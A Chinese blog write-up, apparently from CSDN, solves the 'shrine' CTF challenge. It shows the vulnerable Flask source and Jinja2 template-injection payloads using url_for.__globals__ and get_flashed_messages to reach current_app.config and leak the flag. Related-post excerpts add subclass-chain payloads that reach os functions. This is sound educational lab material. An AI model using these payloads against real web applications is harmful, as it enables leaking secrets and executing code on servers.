攻防世界shrine 模板注入

最新推荐文章于 2022-11-28 14:58:16 发布

yjj哈哈哈

最新推荐文章于 2022-11-28 14:58:16 发布

阅读量393

点赞数 1

分类专栏： SSTI

本文链接：https://blog.youkuaiyun.com/qq_43774856/article/details/111245593

版权

SSTI 专栏收录该内容

3 篇文章

订阅专栏

该博客探讨了一段Python Flask应用代码中出现的模板注入漏洞。通过分析`/shrine/`路由，发现可以利用`url_for`和`get_flashed_messages`来绕过过滤，访问到`current_app.config`，从而获取到隐藏的FLAG。示例注入路径包括尝试访问全局变量和应用配置。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

shrine

打开链接，这里直接给出了源码
在这里插入图片描述

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

从render_template_string函数可以看出，这里应该是模板注入

/shrine/{{1+1}}

在这里插入图片描述
从源码中可以看出，flag应该在config中，但是这里过滤了config无法使用{{config}}
这里我们可以使用url_for和get_flashed_messages

/shrine/{{url_for.__globals__}}

在这里插入图片描述
current_app应该是当前app

/shrine/{{url_for.__globals__['current_app'].config}}

在这里插入图片描述

/shrine/{{get_flashed_messages.__globals__['current_app'].config}}

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

yjj哈哈哈

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【网络安全 | CTF】攻防世界 shrine 解题详析

等风来

07-24

5739

进入环境：格式化代码：这段代码创建了一个 Flask 应用对象，并设置了一个名为 FLAG 的配置项，其值来自环境变量。然后定义了两个路由，一个用于返回当前文件的内容，另一个用于渲染 Jinja2 模板。推测flag在名为FLAG的config中，但黑名单过滤了config，通过Jinja2联想SSTI注入在这个程序中，/shrine/ 是定义的路由路径，会匹配到处理该路径的函数。于是构造路径：回显如下：说明SSTI可行在 Flask 中，url_for 函数是定义在 Flask 的全局命名空间中的

攻防世界-shrine题分析

weixin_46784800的博客

11-21

1040

shrine 题目分析进入靶场后可以看见给出了源码，比较乱的话可以 ctrl+u查看源码：进行代码审计可以发现，这个网页是用flask模板写的，这时就很容易就联想到flask模板注入 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read()

参与评论您还未登录，请先登录后发表或查看评论

web安全-SSTI模板注入漏洞

weixin_61956136的博客

07-31

3999

web安全-SSTI模板注入漏洞

攻防世界--Web进阶--easytornado---模板注入

z2560088的博客

10-11

349

目录信息搜集模板注入生成filehash 信息搜集发现flag的位置，于是我们试试能不能访问报错了查看/welcome.txt 由于render({options})可以猜测有模板注入漏洞。 /hints.txt提醒md5(cookie_secret+md5(filename)) 这个应该是file的hash算法了 filename应该是/fllllllllllllag cookie_secret不清楚模板注入...

CTF-WEB shrine模板注入nmap的基本使用

qq_59350385的博客

07-04

319

[WesternCTF2018]shrineimport flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(s): s = s.replace('(',

WEB shrine模板注入nmap的基本使用

qq_53142368的博客

11-14

379

[WesternCTF2018]shrine import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(s): s = s.replace('(',

攻防世界 Web_python_template_injection

feng的博客

09-03

596

前言这是一道关于python的flask模板注入的题目，刚碰到这个题目的时候我对于flask和模板注入是没有接触过的，因此上网查找相关知识并结合攻防世界给出的WP做出了这个题目。做题前知识点的了解 https://xz.aliyun.com/t/3679 这篇博客对于我这样的萌新来说非常友好，对于flask的ssti模板注入讲解的很好，推荐一看。看完这个，就对flask的模板注入有了一个大致的了解，但是对于如何应用可能有些迷茫，下面结合攻防世界的这个题目来更加深入的了解。 WP 作为一个萌新，刚打开这个

攻防世界easytornado-tornado模板注入

yuanxu8877的博客

11-28

478

攻防世界easytornado-tornado模板注入

攻防世界shrine

最新发布

03-14

Shrine 是 CTF 平台攻防世界中的一个 Web 高手进阶题目，属于 Python Flask 模板注入（Template Injection）类别的漏洞利用挑战。该题目主要考察选手对 Jinja2 模板引擎的工作机制以及 Flask 应用程序内部结构的理解...

攻防世界 shrine 解题思路

xj28555的博客

07-15

2368

进入题目发现一串源代码，但是不规则，所以我们ctrl+u查看源代码这样就整理好了代码，接下来就是审计代码了。我们来看看这个代码都写了啥。首先导入了两个模块，一个flask，一个os。然后用app.route装饰器传了两个路径那我们访问一下这个路径发现shrine后面的内容会被显示到浏览器上，那我我们可以试试是否存在模板注入构造payload /shrine/{{2*2}} 发现进行了运算，那么可以判断这里是存在SSTI的。关于SSTI模板注入前面也碰到了不

攻防世界--Web进阶--Shrine--flask模板注入--全局变量Current-app--沙盒逃逸

z2560088的博客

10-11

2036

查看项目源码代码审计 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def saf...

[wp] Web_python_template_injection 攻防世界

夏日の blog

02-06

1408

打开题目我们看到提示python模板注入，尝试{{1+1}}看看{{}}是否被执行由上图可知代码被执行确实存在模板注入 1.查看所有子类 {{[].__class__.__base__.__subclasses__()}} ...

攻防世界WEB高手进阶之python_template_injection

uihijio的博客

05-18

477

打开网站是写着以下然后测试以下{{1+1}}被执行了然后测试{{’’.class.mro[2].subclasses()[71].init.globals[‘os’].listdir(’.’)}}发现有一个flag 使用{{’’.class.mro[2].subclasses()40.read()}}打开

shrine

怪味巧克力的博客

05-28

579

介绍模板其实就是对于传入的数据进行解析，然后生成html文件，然后在返回给浏览器进行展示，而这其中就用到了模板渲染和模板引擎模板注入的根本原因就在于客户端向服务器传输的参数被解析，由于模板中有较多函数，所以，很多情况下模板注入可以导致远程代码执行，模板注入大概分为这几种：客户端模板注入、服务端模板注入、模板引擎注入。在本题中就是flask/jinja模板注入 0x01 拿到题目后发现给出了一段代码 import flask import os app = flask.Flask(__name__)

攻防世界 python 注入漏洞

灰太的表格的博客

04-06

1590

web_python_template_injection解题思路：首先看到题目，就知道这道题是关于模板注入的，什么是模板注入呢？-为了写html代码的时候方便，很多网站都会使用模板，先写好一个html模板文件，比如 deftest():code=request.args.get('id')html='''<h3>%s</h3>'''%(code)returnrender...

攻防世界-web-shrine-从0到1的解题历程writeup

CTF小白的博客

04-13

4626

题目环境分析首先开启靶机获取到题目如下 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<...

XCTF-攻防世界CTF平台-Web类——16、shrine（Flask框架之Jinja2模板渲染引擎、查看app.config[‘FLAG‘]）

Onlyone_1314的博客

12-11

2033

目录标题python模板注入代码分析：构造Python模板注入url_for()函数查看flagget_flashed_messages()函数查看flag 打开题目地址：这是Python的flask渲染模板 python模板注入 python模板注入漏洞的产生在于Flask应用框架中render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串，而且Flask模板中使用了Jinja2作为模板渲染引擎，{{}}在Jinja2中作为变量包裹标识符，在渲染的时候将{{}}包裹的内

[wp] 攻防世界 Web_python_template_injection

MercyLin的博客

09-28

6675

7*7变成49了,应该存在模板注入 http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()%7D%7D http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()[59].__init__.func_globals.key...

攻防世界 shrine -wp

freerats的博客

07-12

362

打开网址就是一堆代码右击查看源代码方面看些 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): de